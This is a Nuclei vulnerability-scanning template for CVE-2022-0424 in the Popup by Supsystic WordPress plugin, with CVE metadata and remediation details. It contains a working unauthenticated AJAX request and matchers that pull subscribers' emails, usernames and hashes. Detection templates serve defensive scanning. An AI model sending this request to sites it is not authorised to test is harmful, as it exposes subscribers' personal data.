nuclei-templates/http/cves/2022/CVE-2022-0424.yaml

53 lines
1.8 KiB
YAML

id: CVE-2022-0424
info:
name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
author: Kazgangap
severity: medium
description: |
The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
remediation: Fixed in 1.10.9
reference:
- https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0424
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-0424
cwe-id: CWE-306
epss-score: 0.00082
epss-percentile: 0.34103
cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: supsystic
product: popup
framework: wordpress
publicwww-query: "/wp-content/plugins/popup-by-supsystic"
tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
matchers-condition: and
matchers:
- type: word
words:
- '"id":"'
- 'username":"'
- 'email":'
- 'hash":"'
- '_wpnonce'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100e053c1b7ee05de6360e694dc677e8d63d3ff1f7e93d79f51b8809a143d15d129022100a8db2e359329761cce7c314fa1dee1e0309ec32e166b80b386d847eca28a6903:922c64590222798bb761d5b6d8e72950